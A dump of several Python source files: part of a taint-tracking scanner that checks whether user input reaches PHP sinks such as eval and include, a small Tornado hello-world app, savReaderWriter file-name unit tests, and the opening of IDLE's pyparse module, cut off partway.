递归回溯敏感函数的赋值流程,param为跟踪的污点,当找到param来源时-->分析复制表达式-->获取新污点;否则递归下一个节点
:param vul_function:
:param param:
:param nodes:
:param function_params:
:param lineno
:param function_flag: 是否在函数、方法内的标志位
:return:
"""
if isinstance(param, php.FunctionCall) or isinstance(param, php.MethodCall): # 当污点为寻找函数时,递归进入寻找函数
logger.debug("[AST] AST analysis for FunctionCall or MethodCall {} in line {}".format(param.name, param.lineno))
is_co, cp, expr_lineno = function_back(param, nodes, function_params)
return is_co, cp, expr_lineno
if isinstance(param, php.ArrayOffset): # 当污点为数组时,递归进入寻找数组声明或赋值
logger.debug("[AST] AST analysis for ArrayOffset in line {}".format(param.lineno))
is_co, cp, expr_lineno = array_back(param, nodes)
return is_co, cp, expr_lineno
if isinstance(param, php.New) or (hasattr(param, "name") and isinstance(param.name, php.New)): # 当污点为新建类事,进入类中tostring函数分析
logger.debug("[AST] AST analysis for New Class {} in line {}".format(param.name, param.lineno))
is_co, cp, expr_lineno = new_class_back(param, nodes)
return is_co, cp, expr_lineno
expr_lineno = 0 # source所在行号
if hasattr(param, "name"):
# param_name = param.name
param_name = get_node_name(param)
else:
param_name = param
is_co, cp = is_controllable(param_name)
if len(nodes) != 0:
node = nodes[len(nodes) - 1]
if isinstance(node, php.Assignment): # 回溯的过程中,对出现赋值情况的节点进行跟踪
param_node = get_node_name(node.node) # param_node为被赋值的变量
param_expr, expr_lineno, is_re = get_expr_name(node.expr) # param_expr为赋值表达式,param_expr为变量或者列表
if param_name == param_node and is_re is True:
is_co = 2
cp = param
return is_co, cp, expr_lineno
if param_name == param_node and not isinstance(param_expr, list): # 找到变量的来源,开始继续分析变量的赋值表达式是否可控
logger.debug(
"[AST] Find {}={} in line {}, start ast for param {}".format(param_name, param_expr, expr_lineno,
param_expr))
is_co, cp = is_controllable(param_expr) # 开始判断变量是否可控
if is_co != 1 and is_co != 3:
is_co, cp = is_sink_function(param_expr, function_params)
if isinstance(node.expr, php.ArrayOffset):
param = node.expr
else:
param = php.Variable(param_expr) # 每次找到一个污点的来源时,开始跟踪新污点,覆盖旧污点
if param_name == param_node and isinstance(node.expr, php.FunctionCall): # 当变量来源是函数时,处理函数内容
function_name = node.expr.name
param = node.expr # 如果没找到函数定义,则将函数作为变量回溯
logger.debug(
"[AST] Find {} from FunctionCall for {} in line {}, start ast in function {}".format(param_name,
function_name,
node.lineno,
function_name))
for node in nodes[::-1]:
if isinstance(node, php.Function):
if node.name == function_name:
function_nodes = node.nodes
# 进入递归函数内语句
for function_node in function_nodes:
if isinstance(function_node, php.Return):
return_node = function_node.node
return_param = return_node.node
is_co, cp, expr_lineno = parameters_back(return_param, function_nodes,
function_params, lineno, function_flag=1,
vul_function=vul_function)
if param_name == param_node and isinstance(param_expr, list):
logger.debug(
"[AST] Find {} from list for {} in line {}, start ast for list {}".format(param_name,
param_expr,
node.lineno,
param_expr))
for expr in param_expr:
param = expr
is_co, cp = is_controllable(expr)
if is_co == 1:
return is_co, cp, expr_lineno
param = php.Variable(param)
_is_co, _cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function)
if _is_co != -1: # 当参数可控时,值赋给is_co 和 cp,有一个参数可控,则认定这个函数可能可控
is_co = _is_co
cp = _cp
elif isinstance(node, php.Function) or isinstance(node, php.Method) and function_flag == 0:
function_nodes = node.nodes
function_lineno = node.lineno
function_params = node.params
vul_nodes = []
logger.debug(
"[AST] param {} line {} in function {} line {}, start ast in function".format(param_name,
node.lineno,
node.name,
function_lineno))
for function_node in function_nodes:
if function_node is not None and int(function_lineno) <= function_node.lineno < int(lineno):
vul_nodes.append(function_node)
if len(vul_nodes) > 0:
is_co, cp, expr_lineno = parameters_back(param, function_nodes, function_params, function_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3: # 出现新的敏感函数,重新生成新的漏洞结构,进入新的遍历结构
for node_param in node.params:
if node_param.name == cp.name:
logger.debug(
"[AST] param {} line {} in function_params, start new rule for function {}".format(
param_name, node.lineno, node.name))
if vul_function is None or node.name != vul_function:
logger.info(
"[Deep AST] Now vulnerability function from function {}() param {}".format(node.name,
cp.name))
is_co = 4
cp = tuple([node, param])
return is_co, cp, 0
else:
logger.info(
"[Deep AST] Recursive problems may exist in the code, exit the new rules generated..."
)
# 无法解决递归,直接退出
is_co = -1
return is_co, cp, 0
elif isinstance(node, php.Class):
is_co, cp, expr_lineno = class_back(param, node, lineno, vul_function=vul_function)
return is_co, cp, expr_lineno
elif isinstance(node, php.If):
logger.debug(
"[AST] param {} line {} in if/else, start ast in if/else".format(param_name, node.lineno))
if isinstance(node.node, php.Block): # if里可能是代码块,也可能就一句语句
if_nodes = node.node.nodes
if_node_lineno = node.node.lineno
elif node.node is not None:
if_nodes = [node.node]
if_node_lineno = node.node.lineno
else:
if_nodes = []
if_node_lineno = 0
# 进入分析if内的代码块,如果返回参数不同于进入参数,那么在不同的代码块中,变量值不同,不能统一处理,需要递归进入不同的部分
is_co, cp, expr_lineno = parameters_back(param, if_nodes, function_params, if_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
if is_co is not 1 and node.elseifs != []: # elseif可能有多个,所以需要列表
for node_elseifs_node in node.elseifs:
if isinstance(node_elseifs_node.node, php.Block):
elif_nodes = node_elseifs_node.node.nodes
elif_node_lineno = node_elseifs_node.node.lineno
elif node_elseifs_node.node is not None:
elif_nodes = [node_elseifs_node.node]
elif_node_lineno = node_elseifs_node.node.lineno
else:
elif_nodes = []
elif_node_lineno = 0
is_co, cp, expr_lineno = parameters_back(param, elif_nodes, function_params, elif_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1,
vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
else:
break
if is_co is not 1 and node.else_ != [] and node.else_ is not None:
if isinstance(node.else_.node, php.Block):
else_nodes = node.else_.node.nodes
else_node_lineno = node.else_.node.lineno
elif node.else_.node is not None:
else_nodes = [node.else_.node]
else_node_lineno = node.else_.node.lineno
else:
else_nodes = []
else_node_lineno = 0
is_co, cp, expr_lineno = parameters_back(param, else_nodes, function_params, else_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1,
vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
elif isinstance(node, php.For):
for_nodes = node.node.nodes
for_node_lineno = node.node.lineno
logger.debug(
"[AST] param {} line {} in for, start ast in for".format(param_name, for_node_lineno))
is_co, cp, expr_lineno = parameters_back(param, for_nodes, function_params, for_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 or int(lineno) == node.lineno: # 当is_co为True时找到可控,停止递归
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function) # 找到可控的输入时,停止递归
elif len(nodes) == 0 and function_params is not None: # 当敏感函数在函数中时,function_params不为空,这时应进入自定义敏感函数逻辑
for function_param in function_params:
if function_param == param:
logger.debug(
"[AST] param {} in function_params, start new rule".format(param_name))
is_co = 2
cp = function_param
return is_co, cp, expr_lineno
def deep_parameters_back(param, back_node, function_params, count, file_path, lineno=0, vul_function=None):
"""
深度递归遍历
:param vul_function:
:param lineno:
:param param:
:param back_node:
:param function_params:
:param file_path:
:return:
"""
count += 1
is_co, cp, expr_lineno = parameters_back(param, back_node, function_params, lineno, vul_function=vul_function)
if count > 20:
logger.warning("[Deep AST] depth too big, auto exit...")
return is_co, cp, expr_lineno
if is_co == 3:
logger.debug("[Deep AST] try to find include, start deep AST for {}".format(cp))
for node in back_node[::-1]:
if isinstance(node, php.Include):
# 拼接路径需要专门处理,暂时先这样
filename = get_filename(node, file_path)
file_path_list = re.split(r"[\/\\]", file_path)
file_path_list.pop()
file_path_list += filename
if "not_found" in filename:
continue
file_path_name = "/".join(file_path_list)
try:
logger.debug("[Deep AST] open new file {file_path}".format(file_path=file_path_name))
# f = open(file_path_name, 'r')
f = codecs.open(file_path_name, "r", encoding='utf-8', errors='ignore')
file_content = f.read()
except:
logger.warning("[Deep AST] error to open new file...continue")
continue
parser = make_parser()
all_nodes = parser.parse(file_content, debug=False, lexer=lexer.clone(), tracking=with_line)
node = cp
# node = php.Variable(cp)
is_co, cp, expr_lineno = deep_parameters_back(node, all_nodes, function_params, count, file_path_name,
lineno, vul_function=vul_function)
if is_co == -1:
break
return is_co, cp, expr_lineno
def get_function_node(nodes, s_lineno, e_lineno):
"""
获取node列表中的指定行的node
:param nodes:
:param s_lineno:
:param e_lineno:
:return:
"""
result = []
for node in nodes:
if node.lineno == e_lineno:
result.append(node)
break
if node.lineno == s_lineno:
result.append(node)
return result
def get_function_params(nodes):
"""
获取用户自定义函数的所有入参
:param nodes: 自定义函数的参数部分
:return: 以列表的形式返回所有的入参
"""
params = []
for node in nodes:
if isinstance(node, php.FormalParameter):
params.append(node.name)
return params
def anlysis_params(param, code_content, file_path, lineno, vul_function=None, repair_functions=None):
"""
在cast调用时做中转数据预处理
:param repair_functions:
:param vul_function:
:param lineno:
:param param:
:param code_content:
:param file_path:
:return:
"""
global is_repair_functions
count = 0
function_params = None
if repair_functions is not None:
is_repair_functions = repair_functions
if type(param) is str and "->" in param:
param_left = php.Variable(param.split("->")[0])
param_right = param.split("->")[1]
param = php.ObjectProperty(param_left, param_right)
param = php.Variable(param)
parser = make_parser()
all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line)
# 做一次处理,解决Variable(Variable('$id'))的问题
while isinstance(param.name, php.Variable):
param = param.name
logger.debug("[AST] AST to find param {}".format(param))
vul_nodes = []
for node in all_nodes:
if node is not None and node.lineno <= int(lineno):
vul_nodes.append(node)
is_co, cp, expr_lineno = deep_parameters_back(param, vul_nodes, function_params, count, file_path, lineno,
vul_function=vul_function)
return is_co, cp, expr_lineno
def anlysis_function(node, back_node, vul_function, function_params, vul_lineno, file_path=None):
"""
对用户自定义的函数进行分析-->获取函数入参-->入参用经过赋值流程,进入sink函数-->此自定义函数为危险函数
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param function_params:
:param vul_lineno:
:return:
"""
global scan_results
try:
if node.name == vul_function and int(node.lineno) == int(vul_lineno): # 函数体中存在敏感函数,开始对敏感函数前的代码进行检测
for param in node.params:
if isinstance(param.node, php.Variable):
analysis_variable_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.FunctionCall):
analysis_functioncall_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.BinaryOp):
analysis_binaryop_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.ArrayOffset):
analysis_arrayoffset_node(param.node, vul_function, vul_lineno)
except Exception as e:
logger.debug(e)
def analysis_functioncall(node, back_node, vul_function, vul_lineno):
"""
调用FunctionCall-->判断调用Function是否敏感-->get params获取所有参数-->开始递归判断
:param node:
:param back_node:
:param vul_function:
:param vul_lineno
:return:
"""
global scan_results
try:
if node.name == vul_function and int(node.lineno) == int(vul_lineno): # 定位到敏感函数
for param in node.params:
if isinstance(param.node, php.Variable):
analysis_variable_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.FunctionCall):
analysis_functioncall_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.BinaryOp):
analysis_binaryop_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.ArrayOffset):
analysis_arrayoffset_node(param.node, vul_function, vul_lineno)
except Exception as e:
logger.debug(e)
def analysis_binaryop_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理BinaryOp类型节点-->取出参数-->回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
params = get_binaryop_params(node)
params = export_list(params, export_params=[])
for param in params:
param = php.Variable(param)
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno,
vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_objectproperry_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理_objectproperry类型节点-->取出参数-->回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = node
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno, vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_arrayoffset_node(node, vul_function, vul_lineno):
"""
处理ArrayOffset类型节点-->取出参数-->回溯判断参数是否可控-->输出结果
:param node:
:param vul_function:
:param vul_lineno:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = get_node_name(node.node)
expr_lineno = node.lineno
is_co, cp = is_controllable(param)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_functioncall_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理FunctionCall类型节点-->取出参数-->回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
params = get_all_params(node.params)
for param in params:
param = php.Variable(param)
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno,
vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_variable_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理Variable类型节点-->取出参数-->回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = get_node_name(node)
param_lineno = node.lineno
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno, vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_ternaryop_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None,
repair_functions=[]):
"""
处理三元提交判断语句,回溯双变量
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:param file_path:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = node.expr
node1 = node.iftrue
node2 = node.iffalse
if type(node1) is int:
node1 = php.Variable(node1)
if type(node2) is int:
node2 = php.Variable(node2)
logger.debug('[AST] vul_param1: {}, vul_param2: {}'.format(node1, node2))
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node1, back_node, function_params, count, file_path)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
is_co, cp, expr_lineno = deep_parameters_back(node2, back_node, function_params, count, file_path)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_if_else(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
nodes = []
if isinstance(node.node, php.Block): # if语句中的sink点以及变量
analysis(node.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
analysis([node.node], vul_function, back_node, vul_lineno, file_path, function_params)
if node.else_ is not None: # else语句中的sink点以及变量
if isinstance(node.else_.node, php.Block):
analysis(node.else_.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
analysis([node.node], vul_function, back_node, vul_lineno, file_path, function_params)
if len(node.elseifs) != 0: # elseif语句中的sink点以及变量
for i_node in node.elseifs:
if i_node.node is not None:
if isinstance(i_node.node, php.Block):
analysis(i_node.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
nodes.append(i_node.node)
analysis(nodes, vul_function, back_node, vul_lineno, file_path, function_params)
def analysis_echo_print(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理echo/print类型节点-->判断节点类型-->不同If分支回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if int(vul_lineno) == int(node.lineno):
if isinstance(node, php.Print):
if isinstance(node.node, php.FunctionCall):
analysis_functioncall_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Variable) and vul_function == 'print': # 直接输出变量信息
analysis_variable_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.BinaryOp) and vul_function == 'print':
analysis_binaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.ArrayOffset) and vul_function == 'print':
analysis_arrayoffset_node(node.node, vul_function, vul_lineno)
if isinstance(node.node, php.TernaryOp) and vul_function == 'print':
analysis_ternaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
elif isinstance(node, php.Echo):
for k_node in node.nodes:
if isinstance(k_node, php.FunctionCall): # 判断节点中是否有函数调用节点
analysis_functioncall_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path) # 将含有函数调用的节点进行分析
if isinstance(k_node, php.Variable) and vul_function == 'echo':
analysis_variable_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(k_node, php.BinaryOp) and vul_function == 'echo':
analysis_binaryop_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(k_node, php.ArrayOffset) and vul_function == 'echo':
analysis_arrayoffset_node(k_node, vul_function, vul_lineno)
if isinstance(k_node, php.TernaryOp) and vul_function == 'echo':
analysis_ternaryop_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
def analysis_return(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
处理return节点
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if int(vul_lineno) == int(node.lineno) and isinstance(node, php.Return):
if isinstance(node.node, php.FunctionCall):
analysis_functioncall_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Variable): # 直接输出变量信息
analysis_variable_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.BinaryOp):
analysis_binaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.ArrayOffset):
analysis_arrayoffset_node(node.node, vul_function, vul_lineno)
if isinstance(node.node, php.TernaryOp):
analysis_ternaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Silence):
nodes = get_silence_params(node.node)
analysis(nodes, vul_function, back_node, vul_lineno, file_path)
def analysis_eval(node, vul_function, back_node, vul_lineno, function_params=None, file_path=None):
"""
处理eval类型节点-->判断节点类型-->不同If分支回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param vul_function:
:param back_node:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if vul_function == 'eval' and int(node.lineno) == int(vul_lineno):
if isinstance(node.expr, php.Variable):
analysis_variable_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.FunctionCall):
analysis_functioncall_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.BinaryOp):
analysis_binaryop_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.ArrayOffset):
analysis_arrayoffset_node(node.expr, vul_function, vul_lineno)
if isinstance(node.expr, php.ObjectProperty):
analysis_objectproperry_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.Silence):
nodes = get_silence_params(node.expr)
analysis(nodes, vul_function, back_node, vul_lineno, file_path)
def analysis_file_inclusion(node, vul_function, back_node, vul_lineno, function_params=None, file_path=None):
"""
处理include/require类型节点-->判断节点类型-->不同If分支回溯判断参数是否可控-->输出结果
:param file_path:
:param node:
:param vul_function:
:param back_node:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
include_fs = ['include', 'include_once', 'require', 'require_once']
if vul_function in include_fs and int(node.lineno) == int(vul_lineno):
logger.debug('[AST-INCLUDE] {l}-->{r}'.format(l=vul_function, r=vul_lineno))
if isinstance(node.expr, php.Variable):
analysis_variable_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.FunctionCall):
analysis_functioncall_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.BinaryOp):
analysis_binaryop_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.ArrayOffset):
analysis_arrayoffset_node(node.expr, vul_function, vul_lineno)
if isinstance(node.expr, php.ObjectProperty):
analysis_objectproperry_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
def set_scan_results(is_co, cp, expr_lineno, sink, param, vul_lineno):
"""
获取结果信息-->输出结果
:param is_co:
:param cp:
:param expr_lineno:
:param sink:
:param param:
:param vul_lineno:
:return:
"""
results = []
global scan_results
result = {
'code': is_co,
'source': cp,
'source_lineno': expr_lineno,
'sink': sink,
'sink_param:': param,
'sink_lineno': vul_lineno
}
if result['code'] > 0: # 查出来漏洞结果添加到结果信息中
results.append(result)
scan_results += results
def analysis(nodes, vul_function, back_node, vul_lineo, file_path=None, function_params=None):
"""
调用FunctionCall-->analysis_functioncall分析调用函数是否敏感
:param nodes: 所有节点
:param vul_function: 要判断的敏感函数名
:param back_node: 各种语法结构里面的语句
:param vul_lineo: 漏洞函数所在行号
:param function_params: 自定义函数的所有参数列表
:param file_path: 当前分析文件的地址
:return:
"""
buffer_ = []
for node in nodes:
if isinstance(node, php.FunctionCall): # 函数直接调用,不进行赋值
anlysis_function(node, back_node, vul_function, function_params, vul_lineo, file_path=file_path)
elif isinstance(node, php.Assignment): # 函数调用在赋值表达式中
if isinstance(node.expr, php.FunctionCall):
anlysis_function(node.expr, back_node, vul_function, function_params, vul_lineo, file_path=file_path)
if isinstance(node.expr, php.Eval):
analysis_eval(node.expr, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
if isinstance(node.expr, php.Silence):
buffer_.append(node.expr)
analysis(buffer_, vul_function, back_node, vul_lineo, file_path, function_params)
elif isinstance(node, php.Return):
analysis_return(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Print) or isinstance(node, php.Echo):
analysis_echo_print(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Silence):
nodes = get_silence_params(node)
analysis(nodes, vul_function, back_node, vul_lineo, file_path)
elif isinstance(node, php.Eval):
analysis_eval(node, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Include) or isinstance(node, php.Require):
analysis_file_inclusion(node, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.If): # 函数调用在if-else语句中时
analysis_if_else(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.While) or isinstance(node, php.For): # 函数调用在循环中
if isinstance(node.node, php.Block):
analysis(node.node.nodes, vul_function, back_node, vul_lineo, file_path, function_params)
elif isinstance(node, php.Function) or isinstance(node, php.Method):
function_body = []
function_params = get_function_params(node.params)
analysis(node.nodes, vul_function, function_body, vul_lineo, function_params=function_params,
file_path=file_path)
elif isinstance(node, php.Class):
analysis(node.nodes, vul_function, back_node, vul_lineo, file_path, function_params)
back_node.append(node)
def scan_parser(code_content, sensitive_func, vul_lineno, file_path, repair_functions=[]):
"""
开始检测函数
:param repair_functions:
:param code_content: 要检测的文件内容
:param sensitive_func: 要检测的敏感函数,传入的为函数列表
:param vul_lineno: 漏洞函数所在行号
:param file_path: 文件路径
:return:
"""
try:
global scan_results, is_repair_functions
scan_results = []
is_repair_functions = repair_functions
parser = make_parser()
all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line)
for func in sensitive_func: # 循环判断代码中是否存在敏感函数,若存在,递归判断参数是否可控;对文件内容循环判断多次
back_node = []
analysis(all_nodes, func, back_node, int(vul_lineno), file_path, function_params=None)
except SyntaxError as e:
logger.warning('[AST] [ERROR]:{e}'.format(e=e))
return scan_results
|
py | b4001cb043f960de32c8756142d83c2ffb41848d | import tornado.web
import tornado.httpserver
import tornado.ioloop
import tornado.options
import os.path
from tornado.options import define, options
define("port", default=8000, help="run on the given port", type=int)
class HelloHandler(tornado.web.RequestHandler):
def get(self):
self.render('hello.html')
class HelloModule(tornado.web.UIModule):
def render(self):
return '<h1>Hello, world!</h1>'
if __name__ == '__main__':
tornado.options.parse_command_line()
app = tornado.web.Application(
handlers=[(r'/', HelloHandler)],
template_path=os.path.join(os.path.dirname(__file__), 'templates'),
ui_modules={'Hello', HelloModule}
)
server = tornado.httpserver.HTTPServer(app)
server.listen(options.port)
tornado.ioloop.IOLoop.instance().start() |
py | b4001cc0b626abd15fbf81fa475b8e62fa8db364 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import os
import sys
from os.path import basename, join
import tempfile
import zipfile
import savReaderWriter as rw
is_windows = sys.platform.startswith("win")
# issue #35: IOError with umlauts in path to a file for sav.SavReader
# Mostly a Windows-specific thing, see generic.Generic.wideCharToMultiByte
class Test_NonAsciiSavFileName(unittest.TestCase):
def func(self, savFileName):
self.outfile = tempfile.mktemp(suffix="_out.sav")
with rw.SavWriter(self.outfile, [b'v1'], {b'v1': 0}) as writer:
for i in range(10):
writer.writerow([i])
with rw.SavReader(self.outfile) as reader:
self.assertEqual(reader.all(False), [[float(i)] for i in range(10)])
self.assertTrue(os.path.exists(self.outfile))
def test_nonascii_u_filename_german(self):
u_savFileName = u"test_data/scheiß Encoding.sav"
self.func(u_savFileName)
@unittest.skipIf(is_windows, "Chinese in a Western European windows?")
def test_nonascii_u_filename_chinese(self):
# file is zipped: Chinese chars cause errors with .whl creation in Win
zipFileName = "test_data/chinese_chars.sav.zip"
zf = zipfile.ZipFile(zipFileName)
u_savFileName = zf.infolist()[0].filename
u_savFileName = join(tempfile.gettempdir(), u_savFileName)
with open(u_savFileName, "wb") as f:
f.write(zf.read(basename(u_savFileName)))
self.func(u_savFileName)
os.remove(u_savFileName)
def test_nonascii_b_filename(self):
b_savFileName = b"test_data/schei\xdf Encoding.sav"
self.func(b_savFileName)
def tearDown(self):
try:
os.remove(self.outfile)
except:
pass
if __name__ == "__main__":
unittest.main()
|
py | b4001cebc7c5779e13bd95d5b25cc7fc8254e186 | """Define partial Python code Parser used by editor and hyperparser.
Instances of ParseMap are used with str.translate.
The following bound search and match functions are defined:
_synchre - start of popular statement;
_junkre - whitespace or comment line;
_match_stringre: string, possibly without closer;
_itemre - line that may have bracket structure start;
_closere - line that must be followed by dedent.
_chew_ordinaryre - non-special characters.
"""
import re
# Reason last statement is continued (or C_NONE if it's not).
(C_NONE, C_BACKSLASH, C_STRING_FIRST_LINE,
C_STRING_NEXT_LINES, C_BRACKET) = range(5)
# Find what looks like the start of a popular statement.
_synchre = re.compile(r"""
^
[ \t]*
(?: while
| else
| def
| return
| assert
| break
| class
| continue
| elif
| try
| except
| raise
| import
| yield
)
\b
""", re.VERBOSE | re.MULTILINE).search
# Match blank line or non-indenting comment line.
_junkre = re.compile(r"""
[ \t]*
(?: \# \S .* )?
\n
""", re.VERBOSE).match
# Match any flavor of string; the terminating quote is optional
# so that we're robust in the face of incomplete program text.
_match_stringre = re.compile(r"""
\""" [^"\\]* (?:
(?: \\. | "(?!"") )
[^"\\]*
)*
(?: \""" )?
| " [^"\\\n]* (?: \\. [^"\\\n]* )* "?
| ''' [^'\\]* (?:
(?: \\. | '(?!'') )
[^'\\]*
)*
(?: ''' )?
| ' [^'\\\n]* (?: \\. [^'\\\n]* )* '?
""", re.VERBOSE | re.DOTALL).match
# Match a line that starts with something interesting;
# used to find the first item of a bracket structure.
_itemre = re.compile(r"""
[ \t]*
